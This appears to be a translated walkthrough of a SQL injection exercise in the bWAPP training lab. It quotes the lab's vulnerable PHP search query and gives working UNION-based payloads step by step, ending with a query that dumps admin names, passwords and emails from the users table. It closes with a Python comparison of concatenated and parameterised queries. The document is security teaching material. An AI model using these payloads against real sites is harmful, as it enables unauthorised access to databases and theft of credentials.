The Bwapp of SQL injection manual_interv.php

Source: Internet
Author: User

1. Enter the verification code (many people consider this step pointless).

The page then redirects to the familiar injection page. The captcha presumably acts as a login-style check. Looking at "manual_interv.php", the code is as follows:

if(isset($_POST["form"]) && isset($_SESSION["captcha"]))
{
    if($_POST["captcha_user"] == $_SESSION["captcha"])
    {
        $_SESSION["manual_interv"] = 1;
        header("Location: sqli_9.php");
        exit;
    }
    else
    {
        $message = "<font color=\"red\">Incorrect CAPTCHA!</font>";
    }
}

It checks the verification code and redirects to "sqli_9.php".
Here is the code for the search query:
$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";
One thing I should have explained earlier: why a search-type injection such as "1%' and '%'='" runs without an error. The "%'" after the "1" closes the "LIKE '%" that the code opens, and the trailing "'%'='" is closed by the "%'" that the code appends at the end. After injection the query becomes "SELECT * FROM movies WHERE title LIKE '%1%' and '%'='%'", which means: search for "1", with the added "'%'='%'" being an always-true condition. Entering "1%' <query> --+" works the same way: it closes the original search condition, appends the injected query, and comments out everything that follows.
Next, let's look at the SQL injection itself.
2. Enter a single quotation mark to test.

It errors, and the error mentions "%", so a search-type injection is clearly worth trying. Enter "title=1%' and '%'='". Result:

3. Determine the number of fields:
Enter "title=1%' ORDER BY 7--+": normal. Enter "title=1%' ORDER BY 8--+": error. Result:


So the number of fields is 7.
4. Find the displayed positions:
Enter "title=1%' union select 1,2,3,4,5,6,7--+". Result:

5. Query the database name and other information:
Enter "title=1%' union select 1,database(),version(),4,user(),6,7--+". The database is named bWAPP, the database version is 5.5.53, and the current user is [email protected]. Result:

6. Query the table names:
Enter "title=1%' union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'--+". The users table looks the most important. Result:

7. Query the field names:
Enter "title=1%' union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='users'--+". The most important fields are admin, password and email. Result:

8. Query the contents of those fields:
Enter "title=1%' union select 1,database(),version(),group_concat(admin,'||',password,'||',email),user(),6,7 from users--+". Result:
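To make the closing-quote mechanism from the search-query section (and the single-quote probe of step 2) concrete, here is an added example that is not bWAPP's code: a Python script with an in-memory SQLite table standing in for "movies" (constructed sample rows), running the concatenated query next to a parameterised one. It assumes sqli() returns its input unchanged, as at bWAPP's lowest security level.

```python
import sqlite3

# Constructed sample rows standing in for bWAPP's `movies` table (not its real schema).
MOVIES = [
    ("Iron Man", 2008),
    ("Terminator 2", 1991),
    ("Ocean's Eleven", 2001),
    ("2001: A Space Odyssey", 1968),
]


def _connect():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, year INTEGER)")
    con.executemany("INSERT INTO movies (title, year) VALUES (?, ?)", MOVIES)
    return con


def search_vulnerable(title):
    """String concatenation exactly as in the bWAPP query above, assuming
    sqli() passes the input through unchanged. A lone quote breaks the
    statement (step 2's probe); `1%' and '%'='` closes the LIKE pattern and
    appends an always-true condition; `--+` comments out the trailing `%'`."""
    sql = "SELECT title FROM movies WHERE title LIKE '%" + title + "%'"
    con = _connect()
    try:
        return [row[0] for row in con.execute(sql).fetchall()]
    finally:
        con.close()


def search_safe(title):
    """Parameterised query: the input is bound as data and can never close
    the quote. Binding alone does not neutralise LIKE wildcards, so % and _
    are escaped too, otherwise a user-supplied '%' still matches every row."""
    escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT title FROM movies WHERE title LIKE ? ESCAPE '\\'"
    con = _connect()
    try:
        return [row[0] for row in con.execute(sql, ("%" + escaped + "%",)).fetchall()]
    finally:
        con.close()
```

With the vulnerable function the tautology input returns every title containing "1" and a bare quote raises a syntax error; with the safe one the same inputs are matched literally, and the quote simply finds "Ocean's Eleven".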
